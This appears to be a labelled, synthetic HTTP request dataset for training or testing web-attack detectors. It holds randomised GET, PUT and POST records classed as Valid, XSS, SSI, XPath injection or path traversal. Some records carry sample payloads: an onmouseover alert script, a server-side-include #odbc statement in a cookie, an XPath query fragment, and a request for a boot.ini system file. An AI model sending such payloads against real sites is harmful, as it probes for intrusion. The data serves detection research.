X-Forwarded-For: 111.147.190.89
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47637
Start - Id: 47851
class: XSS
GET /rh8Vh_469MHR/Wv/sittc/3It_B/6baeedaorqtfj7dlqFQ/eNSFzwmgNs/optewn/sheerFiwiu7n/d.I6.asp?ytidednpe7=2&QKChttpsAtelnetFrk=1683821&ohIne5xoiSs4oo=e2d&h9zIy=rU+y&tBfvji=9349&3FUycMCp=%3Cdiv++++onmouseover+%3D+%22+%5Balert++++%28%27gs%27%29%3B%5D+++%22++%3E HTTP/1.1
Host: 0.87.51.248
Connection: etiNIahg
Accept: image/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=89902
Client-ip: 152.45.178.78
Cookie: eathw2=2endnfha5baUaao;6d=ajol;vyUlw=711982;eostdsaot0adeg=ilolwXy-f;xterm4-5=  a esIea0efu
Cookie2: $Version="459"
Date: Sat, 09 Jul 05 12:28:20 GMT
ETag: W/"LURUItJivcqELL-hp6D3"
Expect: mrthhp=AsnbEEk;eeuvr
From: tioExt@xadhwC.ch
If-Modified-Since: Sun, 24 Jan 10 12:59:42 CET
If-Unmodified-Since: Sat, 20 Mar 10 04:40:22 GMT
If-Match: "KZDRXCa3Xxp@Vy_t."
If-None-Match: "voB8RggetRejnzwO"
If-Range: *
Max-Forwards: 3913
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: aibnm 3nd5Ean8=1Tde
Authorization: Digest realm
Range: 595606-7,222673-07
Referer: http://hczba5.fr/tsmr0W9i/i1ide/7ota3r/euRY.jpeg
TE: deflate;q=0.8,trailers
Trailer: Trailer
User-Agent: Mozilla/3.4 (Windows; U; WinNT 3.8; sh-in; rv:6.1.0) Gecko/68878993
UA-CPU: x86
UA-Disp: 4309,162,32
Via: maey/7.0 www.dgsostt.jpg, FTP/2.0 64.76.197.235:1
Transfer-Encoding: deflate
Upgrade: eceRm/0.3, e5aiw8/4.3, ahnzt/2.0
Warning: 626 136.170.222.193 "qysfxete3o" "Wed, 05 Sep 07 23:11:56 UTC"
X-Forwarded-For: 188.24.5.207
X-Serial-Number: 42043067553619454717
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47851
Start - Id: 28325
class: Valid
GET /etcjm4GsystemOx3NrMRc/gtgd/iafdclTrsfdAo0mwh/s1Tx-6ljQ__psALse/aQ2FWyEJPNJAE@ewm/yO9Iywcchild/passwdiq9V4cIQ/lyhuz40y@o1xs/beoj/uga8qteaentpshU/lAny.swf?rireii=603&te=2tdrtt&mnno51aeosa=eatEt+a&majtorae=62goyenern&qI8pw=6&r3oftynes=8613&indkdqQ=i2Is%40lEOLGx HTTP/1.0
Host: www.eatrsfp.fr:60
Connection: zi9tirpt
Accept: application/rtf;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: epe-gflnu5o;q=0.9
Cache-Control: min-fresh=31
Client-ip: 33.66.117.12
Cookie: rsttNrNc8wuae=2lifttlmnpnj3Nbhrd;grae=pmtle;jzqbody-Xo28=aot;C302scriptID=tselectr
Cookie2: $Version="118"
Date: Tue, 11 Oct 05 15:52:28 GMT
ETag: "8Twi41_@XztXskW"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Thu, 21 Dec 06 16:26:39 GMT
If-Unmodified-Since: Thu, 28 Dec 06 07:35:10 CET
If-Match: *
If-None-Match: "4-K2DZ1KFUDt5YanwLq"
If-Range: Mon, 27 Mar 06 23:35:55 CET
Max-Forwards: 9610
MIME-Version: 9.3
Pragma: nlnqhew3=ab
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: gsosi wmqsnju=semcasi
Range: 1084-,9187-,-3
Referer: http://www.l4aaacls.ch/tyaK/eTei.gif
TE: gzip;q=0.4,deflate;q=0.2
Trailer: Max-Forwards
User-Agent: ixYqwPZ http://www.xy6b2m.cz
UA-CPU: StrongARM
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 680x9650
Via: FTP/2.0 186.212.231.183:992
Transfer-Encoding: 2lncs; MsdaeYn=gyd3sc
Upgrade: rl4/6.8, aliys/9.9
Warning: 911 196.37.232.17 "eetcelei" 
X-Forwarded-For: 146.40.109.99
X-Serial-Number: 4245119888
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28325
Start - Id: 23670
class: Valid
GET /dvpWi/YITeMp19O0Q.pl?q6Ex12U3vbscriptXnetcatt=96&0otrenna=f&etxheysLoaIhh=%7CaeteO+7selectiz&EORXzHvar0GGOL=e5toiRTmwcRohcfGe&.ujdt=197818633&ndrht7=script&eitsRunrhueu=se&9abb0s=y8mnOtafesoeipe HTTP/1.0
Host: 90.23.23.173
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-8859-9, windows-1258
Accept-Encoding: gzip, gzip, identity;q=0.7, identity;q=0.0, gzip;q=0.1
Accept-Language: 6t-dNsaear;q=0.8
Cache-Control: no-transform
Client-ip: 11.157.68.9
Cookie: itluaji6wrfast=29;aastoob=salsdimr;Es=urbMmtGg
Cookie2: $Version="38"
Date: Tue, 03 Mar 09 04:51:55 GMT
ETag: W/"pKrvb-.Q-sOD@DVzJlF"
Expect: hotxeoT=ssSrx
From: lanon@fBeece5si.gov
If-Modified-Since: Thu, 06 Aug 09 22:29:30 CET
If-Unmodified-Since: Wed, 18 Feb 04 14:22:35 UTC
If-Match: "w0ULpoiMTeOUomSPlM63"
If-None-Match: "F229G6KcZ.8WK.x4PmS"
If-Range: "be8ifYyl1xN3Lu_s@"
Max-Forwards: 12
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: Basic cm50ZTE6bGhuaWRwaA==
Range: 39769-5373,359385-
Referer: /aEkaet/httitet/8rIr.asp
TE: chunked
Trailer: Warning
User-Agent: oPHbrqB (pH1qzZ6n; bxomcPu-ct; fOEKZj-; uvUM_lr)
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 961x2992
Via: 6.5 221.4.121.67
Transfer-Encoding: compress
Upgrade: lfn/6.1, EejE/5.5, dt2/9.5
Warning: 628 67.26.215.19 "pv5dhesasmwm" 
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23670
Start - Id: 4667
class: Valid
PUT /huW6thcon7gdFjSia/hJPwc7U/ba/qelotznere/NIdnitohl/nvL20X71nCYk/ag3roes/lY0pT/E5-QxKphp.php4? HTTP/1.1
Content-Length: 47
Content-Language: nrni,dhxasg,ChE
Content-Encoding: compress
Content-Location: /o0ulhar/EdvWteh/Sar7cYot/meauosl/ij5m.aspx
Content-MD5: eXdOS245dHVybmFvZHBtYw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 11 Jul 08 03:28:56 CET
Last-Modified: Fri, 21 Sep 07 17:59:14 UTC
Host: www.bkhual5b91.de
Connection: 2weoe
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.6, gzip;q=0.8, compress
Accept-Language: *;q=0.7
Cache-Control: max-stale=15
Client-ip: 138.205.233.134
Cookie: ltuwoue=wezwKaOV;telIhoe5gEa='Ounct;KhomeQj.747=ues a4?pi7lmdfe
Cookie2: $Version="41"
Date: Sun, 11 Jan 04 23:42:58 GMT
ETag: W/"FEBhqY.22nJl2SXl"
Expect: 100-continue
From: es6emnTp@6gdtmKmk.uk
If-Modified-Since: Thu, 22 Dec 05 13:10:18 GMT
If-Unmodified-Since: Thu, 10 Dec 09 20:22:53 GMT
If-Match: *
If-None-Match: "y.FJ8PQCpRpqFGG0Ui"
If-Range: "F5g_S1N-ENGStoiOk"
Max-Forwards: 4
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: hldtn eieme=dloheAoy
Authorization: Basic b2RIbzppY2lTdnlpdg==
Range: -40876
Referer: /cowh/hnejt/umonle/e61g.mdb
TE: chunked,gzip,deflate;q=0.1
Trailer: Pragma
User-Agent: 1hhicoDaar (2cLfeP; phufxLFTRz; u1HtebMzt.)
UA-CPU: 68000
UA-Disp: 860,425,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 111x089
Via: 2.0 0.41.4.21, 2.8 www.ezeh.jpg
Transfer-Encoding: gzip
Upgrade: cdZ/6.2, tOo2/2.7, neA/5.6, es0/1.8
Warning: 496 www.niTE.jpeg "d7swtamz" "Thu, 24 Mar 05 12:21:16 UTC"
X-Forwarded-For: 112.130.112.55
X-Serial-Number: 42430609467360464
----: -------------
~~~~~: ~~~~~~~~~~~~

T7@Ajbopen.perlL1position= &sIn5enHtscy=3938494

End - Id: 4667
Start - Id: 40961
class: SSI
PUT /u5f011d3fFoYSavqjC/dqq-z/mE-C1_sexecu/oWmy/hnc8/pLLMmT09XN/nlep1AclFEnnsavers2e/Kwi71ke1osedssr/aIHygF_ao_RTr2/ye5shcaedznx1dHyel0.shtml? HTTP/1.0
Content-Length: 66
Content-Language: vdz,nadi,esiqhdJs
Content-Encoding: deflate
Content-Location: http://www.4Eea4ht.net/lnnmuans/thirnan/oWhz/uevgy.cfm
Content-MD5: Z2Voc2tjaWxydXFpbXRpaQ==
Content-Type: application/x-www-form-urlencoded
Host: www.ijfnetd.gov:094
Connection: close
Accept: */*;q=0.8
Accept-Charset: macintosh;q=0.3, windows-1254, iso-8859-6;q=0.0, windows-1251;q=0.1, iso-8859-1;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.7
Cookie: iostatqma=<!--   #odbc  statement  =    "select   rsbg9rsh,     o8anrwti,     ahsa   from   rsipqe55as    order   by    4,     958, 6"  -->;ys3tmOrnbim2a=mx;82hr=3qe6tquaunT;cri=hriaobjecte;uryneielydt3ue=68815700
Cookie2: $Version="5"
Date: Sat, 17 Jan 09 20:15:23 UTC
Expect: 100-continue
If-Match: *
Max-Forwards: 9
Pragma: rr=jrthotp
Authorization: Digest opaque="eecreg"
Referer: /n17s/zeare.php4
Trailer: Pragma
User-Agent: Mozilla/9.0 (Windows; U; Windows NT 6.1; eh-jw; rv:2.8.6) Gecko/97798289
UA-Pixels: 561x296
Warning: 544 64.88.140.115:1 "inhaouMpon7ey6d" "Wed, 16 Nov 05 16:56:48 UTC"

Oyic2hZemjse86=e@tot&ncM4m=40&eeoonAo=lO6&ufeh=rjI&kamtCip=afmUG

End - Id: 40961
Start - Id: 3866
class: Valid
PUT /h.Ollf7bvCDwvnr/hYVd97SyMhJtYi/q2xtermxj/anwlclifddro5/olFpAw1e_vk3/sonea9d.tiff? HTTP/1.0
Content-Length: 236
Content-Language: l
Content-Encoding: compress
Content-Location: http://www.Yetjha.org/1sgfiltd/case/KeotE/1ttrtaa/WisRtt.sh
Content-MD5: dFNhd3RvY3VzdWxuZW1Fbw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 15 Feb 08 11:19:24 CET
Last-Modified: Mon, 20 Dec 04 14:43:24 UTC
Host: www.7tvfewlnos.ch
Connection: hartr
Accept: image/png;q=0.4, application/x-tar, image/gif;q=0.4
Accept-Charset: gb2312, iso-8859-4, koi8, utf-8;q=0.1, x-mac-korean
Accept-Encoding: 
Accept-Language: 3bsrr-strnhjun;q=0.9, un7cn-e, 1a2sc-on, 5zuo-T;q=0.4, eoOedhom-uoaanE
Cache-Control: dieh=yeargron
Client-ip: 57.202.122.223
Cookie: enftj2e=li;HRrhl5Ue2itaqd=9729;5H9=mds~autoexec\;eUnM0GAb=92;snretc=ovbscript@/lstorD;sfohoirhp=burulidtue2jnr
Cookie2: $Version="45"
Date: Wed, 15 Aug 07 06:25:51 CET
ETag: W/"4CuJc2UOB2IJoeLBxRF"
Expect: 100-continue
If-Modified-Since: Fri, 21 May 04 20:07:28 CET
If-Unmodified-Since: Fri, 03 Sep 04 15:18:40 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 87
MIME-Version: 1.4
Pragma: c6omshn=aB
Proxy-Authorization: Digest response="De66272Faccbf0D0AB5EeE7D2E7bBaFa"
Authorization: Digest algorithm=9aitchco
Range: 459294-700,2-,-859
Referer: http://www.sie0zqi.be/5heigol/enhr.cfm
TE: deflate,trailers
Trailer: User-Agent
User-Agent: Mozilla/4.7 (compatible; MSIE 7.6; Mac OS X; lganrseut; hnirms; rlragBnUds)
UA-OS: WinNT
Via: 4.0 150.112.200.87, 3.0 40.158.119.36
Transfer-Encoding: identity
Upgrade: 1dd/5.6
Warning: 358 50.141.159.101 "eefthcbta34PysTeoes" 
X-Forwarded-For: 98.4.104.84
X-Serial-Number: 937892727463428
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

samserviceskM.Bpwgroup by=+isa5~tesCo &htun=on>WesomMceesnerne&lM0d5=oe&1OXa=umissai&ecf474ot7d=scrd&rrl5onea=h8J&dDohtzketNg=yr9nteecv2ltomt&inmn=810275&nh=evaln?idiv$dfopt8&v9isn2sNtnrid=0&onfhpc=bzKgvo&ei7ntoaeuptheul=Xa~

End - Id: 3866
Start - Id: 4862
class: Valid
PUT /3BeZgxtvAEVs/ten7irs0cleeooe8rE/r3hif2/kYlua_F2PBi/atsiS/titdtiyo/jAFz9.css? HTTP/1.0
Content-Length: 177
Content-Language: eqInne
Content-Encoding: compress
Content-Location: /ezroleHe.tiff
Content-MD5: b25ldHhzZWV0eG1hamJvbA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 22 Nov 06 20:39:12 GMT
Last-Modified: Fri, 24 Sep 04 16:41:33 GMT
Host: 229.179.72.37
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: o4aaeiod-n, tehtnei-ejn;q=0.0
Cache-Control: no-store
Client-ip: 3.49.175.61
Cookie: Eslmwtttcrn9=omm+4tunerm es=xi;ApgnFTplwh3hi=5;dp2nls=950695233;eLesDzredNtIen=wetyoptw1ief wmio
Cookie2: $Version="272"
Date: Sun, 16 Jul 06 16:11:02 GMT
ETag: W/"oLVD.wVFO0r1FkqcV"
Expect: Fsehcm
From: aehasf@rNt8rn.gov
If-Modified-Since: Tue, 20 Jul 04 05:46:55 GMT
If-Unmodified-Since: Wed, 08 Sep 04 21:05:31 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 39
MIME-Version: 7.7
Pragma: e=ncmxc
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: aiTr thexead=tsiFls
Range: 09264-,-3
Referer: /yeofe/torq/8yodahbe/iy8bhE/afnuGo.pl
TE: trailers
Trailer: Transfer-Encoding
User-Agent: ag7wontm/8.0.8.4
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 931x5037
Via: HTTP/6.8 199.45.7.5, 2.1 www.gexIeo.js
Transfer-Encoding: deflate
Upgrade: tma36/6.6
Warning: 091 www.ve9ajra.gif "5hatsaitInswuanhdaEe" "Fri, 20 Jun 08 21:51:13 CET"
X-Forwarded-For: 119.68.107.192
X-Serial-Number: 58526330051599460
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pd=mZKU4HDTmo&pinho8weeagn=n@K-AYS4O4L&gti0h=~rs<rG&TNbletmtG=uathiapuiRrga &edambnebtx=193644&6fewgetk.=nm4pxPEnR8O&Rtsw=tnull~oacceptd&endfoepsi=akuow&n4rde=tf8mbvrJ9w

End - Id: 4862
Start - Id: 10674
class: Valid
GET /nhshcama/rawXT/nnwWrziydSeldvlyeFg/e750ooY/eQG@OjO4OiElv-d/8onn/hjwggcX7den/iccT1mA.pl?rdsxsq=ilZvXtgnWs&@bselectV=tKKxcV._%40R&dVQx56IfWG=66163845&haonLNwka=Bd&9dAxcw4nhm=592&R0ZnTerueyt2mn=sTGaw&eha3ai=75912&tmf1ue=mWk6 HTTP/1.1
Host: 114.206.206.104:80
Connection: ieyy
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: eihCim-n
Cache-Control: no-store
Client-ip: 245.69.51.123
Cookie: hiiros8hsImh1ol=aocT;ea2gjMdhpinr=0469499053;XhcPeAievlustzh=e5itnisrf;siid8rS=o1le;4onwp6o=r2SR;bayxdevuseoh=adminr>tsobjectm:oeatcr$Oopasswdautoexec
Cookie2: $Version="92"
Date: Fri, 28 Aug 09 18:13:03 UTC
ETag: "4HW@456wgHvT5yjvX96"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Thu, 16 Dec 04 10:22:34 GMT
If-Unmodified-Since: Mon, 01 Jun 09 20:51:13 GMT
If-Match: *
If-None-Match: "BwfILPO5bSU.bU80cK"
If-Range: Wed, 28 Jul 04 23:44:19 UTC
Max-Forwards: 6237
MIME-Version: 1.3
Pragma: 29iM2M=g7hmdo9
Proxy-Authorization: Basic WXRlb2VoaTp3aGk3bnM=
Authorization: ogis adctw=trnyn
Range: 9268-2780
Referer: /eetrNch9/unslIee/Tstca9ai.avi
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.3 (Windows; U; WinNT 0.3; ao-as; rv:2.2.6) Gecko/80827761
UA-CPU: 68000
UA-Disp: 2636,1101,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 6678x842
Via: 3.9 112.174.22.178
Transfer-Encoding: h83rtu
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 628 www.adro.shtml:8 "wytptersn" 
X-Forwarded-For: 168.27.206.6
X-Serial-Number: 45651300212096623
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10674
Start - Id: 14291
class: Valid
GET /dNUL@scripthqjEmeta7ks/tlvwdeqrhntatet/oDvbe.tiff?esm7Ivee=epnozi%7Cg&zh=aaihlansf&0gXlJGLJJeQd=S&tolgw=aoi&wgou=inputTlu&3sfttr3fWcq=6225622&SvIhsJVbOX=22060516&geaTCuds=oncas%5Ce3nph-u&ggewdhfiae=rxBQz5M1s3P&tmocidtbaNt=nRa HTTP/1.0
Host: 142.185.62.204:19
Connection: close
Accept: audio/basic;q=0.9, audio/x-wav, image/jpeg;q=0.6
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 12.204.42.238
Cookie: sThoo8liw=230;OoYiRNkG3=heodroddoidifT;iB1c=340478;qzFcF=mrwkfuettw;m0hsotda=92735834;ijedlh3ugT=bit%Ms8nu
Cookie2: $Version="9"
Date: Wed, 13 Jun 07 03:24:18 CET
ETag: W/"UozJeZl-wTXUU04"
Expect: ya6mphne=miwliiHh
From: 5Urtoesa@acesm4hrat.de
If-Modified-Since: Tue, 27 Oct 09 21:58:00 GMT
If-Unmodified-Since: Tue, 20 Jul 04 22:52:17 CET
If-Match: "-UW3tfrP2_zHhe.Pw1v"
If-None-Match: "xN0TfuDDSqE2UgF1a"
If-Range: Sun, 25 Jan 04 19:35:46 UTC
Max-Forwards: 3694
MIME-Version: 8.7
Pragma: 4j='saAkea7e'
Proxy-Authorization: Basic eXJuYjZlc0U6aHRBbmVv
Authorization: Basic ZXhlZXNFOm9sb2RpNjM=
Range: 921-,-3
Referer: /2oFttmr/gnjaIe/aInnd.nsf
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 1.6; xA-59; rv:7.8.0) Gecko/18868354
UA-CPU: MIPS
UA-Disp: 6371,9716,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2883x951
Via: FTP/9.4 0.240.215.87, 4.1 160.137.233.89
Transfer-Encoding: deflate
Upgrade: tut/3.1, tnmcy/2.5, 9Pn5n/5.5, wtte/0.4, sWn/2.2
Warning: 953 183.109.137.63 "rnlaarimmgE4" 
X-Forwarded-For: 152.150.192.212
X-Serial-Number: 731610342681835186
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14291
Start - Id: 6173
class: Valid
POST /pboltzd/PCxbu_/iVam/veD20ri/ftB4P/JpB3sQ/1_SCn04G5wd/-Ru4/2YfCGYs2xD6P@/3anw/Toeeb3panR6Mrd.dll? HTTP/1.0
Content-Length: 90
Content-Language: 5ng3
Content-Encoding: deflate
Content-Location: /nsiio/ulno/h3ttnwTN/iewttoi/nfsn4.swf
Content-MD5: bU5IMmlhT2dMYmhrTnVhUg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 02 Oct 07 12:44:01 UTC
Last-Modified: Wed, 31 May 06 15:15:29 GMT
Host: www.sroEAdaUsc.gov:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip, identity;q=0.2
Accept-Language: eednY-l;q=0.1, 6ervtut-sn, N8yeraa-AxoRt
Cache-Control: min-fresh=175
Client-ip: 118.127.32.11
Cookie: eeNatn=T%Na&e
Cookie2: $Version="6"
Date: Sat, 06 Mar 04 01:35:28 GMT
ETag: W/"TPeGvsOQvBAbSl0"
Expect: 100-continue
From: ie7ofUi@efph.fr
If-Modified-Since: Wed, 05 Jul 06 05:30:43 GMT
If-Unmodified-Since: Sun, 23 Sep 07 06:10:41 CET
If-Match: "cpYC0mJ0xEp1ORC1b"
If-None-Match: *
If-Range: Fri, 09 Sep 05 15:39:00 CET
Max-Forwards: 0
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Basic MUV6bGVxOlZhZmF5c3Ji
Authorization: Basic bmVhZTphbnJyYXRybA==
Range: 144-
Referer: http://www.Wott.gov/dQtdcae/Srru2htr/wHct4U/netreNa1/uudC.dll
TE: trailers
Trailer: Accept-Language
User-Agent: oeeuntAe0/1.6
UA-CPU: StrongARM
UA-Disp: 2552,3892,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3345x4822
Via: 6.9 www.fdeeea.shtml, 0.3 www.egpabe.png
Transfer-Encoding: gzip
Upgrade: lnss9/9.1, fla2e/4.4, etv/4.8, Ihxsmr/0.7
Warning: 029 www.mrtsha.jpg "Uoiemhw5aEjopHihf" "Mon, 22 May 06 11:12:43 GMT"
X-Forwarded-For: 147.71.226.116
X-Serial-Number: 113642708
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eiN7n=07900700&Ehzr8=92229&dbetweenk2jufromQ=/onceus4&ron=nteIndcmtsttrn&ealhthsksahee=a

End - Id: 6173
Start - Id: 48619
class: XPathInjection
PUT /ut/oeaHyet/iOP0bik2mx/syetgt0n3t1lasi1rtzc/p4h5H_xD1/eoeeAodaOto2S/0HcudHQopO_4tV.dll? HTTP/1.0
Content-Length: 266
Content-Language: wAtjh,ktRf,hef
Content-Encoding: identity
Content-Location: /p6mt/iZDa/bcrcaor/nbeKt.swf
Content-MD5: aWNlOHRlbjlvc25lbHNlYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 27 Oct 08 18:17:54 CET
Last-Modified: Sun, 05 Aug 07 08:36:52 CET
Host: www.low0.st
Connection: irTCes
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, gzip, identity;q=0.8, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 74.177.18.101
Cookie: sso=alyZPpBUO;C.CAqdwTYq5=ujtm3eera;eteuso9ogaesls=y3ggtsd;yltqxT=gZ6a
Cookie2: $Version="07"
Date: Sat, 02 Jun 07 14:13:39 UTC
ETag: W/"nUus8CIhQ-6I@fzm7nrc"
Expect: 100-continue
From: ewioailt@flio7hb.com
If-Modified-Since: Wed, 04 Feb 09 09:04:53 GMT
If-Unmodified-Since: Wed, 24 Mar 10 08:07:47 UTC
If-Match: "BYvSWUPhani0Q3YK"
If-None-Match: *
If-Range: "@JlmDh-RLVueZRzFfl8"
Max-Forwards: 6683
MIME-Version: 7.4
Pragma: iuide9='Wte5at'
Proxy-Authorization: Basic ZWVpVDpoZGVvc0Fz
Authorization: 2h3a NzoO=ebtbb
Range: 3-574
Referer: http://www.eaDa.fr/infdhxyt.wmn
TE: trailers,gzip;q=0.9,trailers
Trailer: Referer
User-Agent: 4KUIU2s http://www.t2uyhfrO.com
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: l1u/7.1 www.eb11nnua.js
Transfer-Encoding: compress
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 98968
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aFnetcat5=nRh&ttpewnltnuosrlf=eato5nTrbevta&6sap=od0ou']     |  P  | //user[   name/text(  )  =   'o1&1a3=1c0hovvwjuersw&KyD5fromX9wCTaG=75&bpARIrv8alc=]isrY'sKbaio 3g&dwrea92=earm&saiasiL5ak42dot=eVaien0tobf4hst2zu&a4exnci0neqtux=o2adlet

End - Id: 48619
Start - Id: 36073
class: PathTransversal
GET /yY7/r3b/6perloHPEchildphpwzadmindHWM/li-9s9-@M.shtml?gUzvY=f%3A%5Cwinnt%5Cboot.ini&Seoj5tvllBuggme=eyeots HTTP/1.0
Host: 34.48.96.108
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.4, identity;q=0.2
Accept-Language: 8Vd-rsine, Rrt-pmeg;q=0.3, a-vEeFpeie;q=0.6, dn5haFri-Rzucnz, pofh5-rke
Cache-Control: min-fresh=644
Client-ip: 150.142.192.26
Cookie: tFdyT=osiio6ae
Cookie2: $Version="080"
Date: Fri, 25 Dec 09 22:05:42 UTC
ETag: W/"CHRBHIdtJ0gNNdG"
Expect: taRsras
From: Esva@5c4oorIai.it
If-Modified-Since: Tue, 14 Oct 08 23:18:10 GMT
If-Unmodified-Since: Mon, 03 Apr 06 18:00:51 CET
If-Match: *
If-None-Match: "SEoJqpB@sJL79pzysCs"
If-Range: Sat, 24 Jan 09 01:04:56 UTC
Max-Forwards: 4
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic ZXd3b2Y6aHh0YQ==
Authorization: Basic Y3J0TmlhOmltbGxvYQ==
Range: -31,-3,49859-
Referer: /mns2/sehSts/sSsrr/hesth.gif
TE: deflate
Trailer: Warning
User-Agent: Mozilla/0.2 (compatible; MSIE 4.2; SunOS sun4u; rvwe)
UA-CPU: x86
UA-Disp: 6269,3972,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 745x4826
Via: 9.4 www.bene.jpg, 6.0 145.84.143.195, FTP/0.7 www.i0qtsihs.shtml
Transfer-Encoding: gzip
Upgrade: sztad/3.9, y9oto/3.0
Warning: 470 84.239.232.183 "ogeeensejl" "Mon, 03 Jan 05 03:00:35 CET"
X-Forwarded-For: 45.91.182.246
X-Serial-Number: 6525817077743739404
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36073
Start - Id: 21994
class: Valid
GET /ioct6vs/NJNZqj/AXPechowbAm/r3tDr3jf8p/m@WC/RPwinntK4hzAqTU/4Y1SMv10MrMcc2aut-/WG-MlIg3BcX/ja/hrEhere2par0dlL.gif?ei=0181&5iOzGka4Vhttps=5636&coazzhahgdweqi=evM8c7K4E&6febeei=+stylewttbAjiv1&hmery4=i%5Dnns%5CetMenclswy&somlfhlxjmxMq=3b3eairh&r3w=49809 HTTP/1.1
Host: 176.185.10.175
Connection: mwlw
Accept: */*;q=0.5
Accept-Charset: koi8-r, windows-1252;q=0.7, iso-8859-15
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 177.69.64.222
Cookie: brd8dHpizo4stk=tab46gJjll;h9Ynhteaha=31909066;0FtvLUphp=8908456
Cookie2: $Version="3"
Date: Fri, 03 Feb 06 13:01:16 UTC
ETag: W/"avjwR4E@c.5c68cUni3"
Expect: t1pAvt=twGl;duahhn
From: suceO@teSeaq.com
If-Modified-Since: Tue, 17 Jan 06 14:08:45 GMT
If-Unmodified-Since: Wed, 20 Feb 08 03:59:11 UTC
If-Match: "xUYexPqDyMPggY0YFJU"
If-None-Match: "rzekyQDIk2TcBX6I-t"
If-Range: "tHj_95txXBIPt5W_TL6"
Max-Forwards: 84
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: acWit iAe1idba=buioi
Authorization: Digest response="1Cf7Fa513Bba1918bd1ad9C06B9cAc5b"
Range: 2-874,8-,3113-623962
Referer: http://atne.net/cigl/Aannt/eeeit/CtaeoTu/ephUio2.gif
TE: chunked,trailers
Trailer: Expect
User-Agent: Mozilla/0.6 (Windows; U; Windows NT 7.3; il-Tt; rv:7.2.4) Gecko/17776315
UA-CPU: PowerPC
UA-Disp: 514,290,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 3071x562
Via: 0.0 www.qemxnsH.js, 9.7 23.237.238.213, HTTP/4.1 135.16.184.35:1718
Transfer-Encoding: 5nsr; ogShn=teeeMAi
Upgrade: pslon/8.8, odo/8.5, henn/0.9
Warning: 029 www.zsherB.css "Rh1ouee3zlgNaapmibi3" 
X-Forwarded-For: 8.4.31.107
X-Serial-Number: 920022590702
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21994
Start - Id: 21350
class: Valid
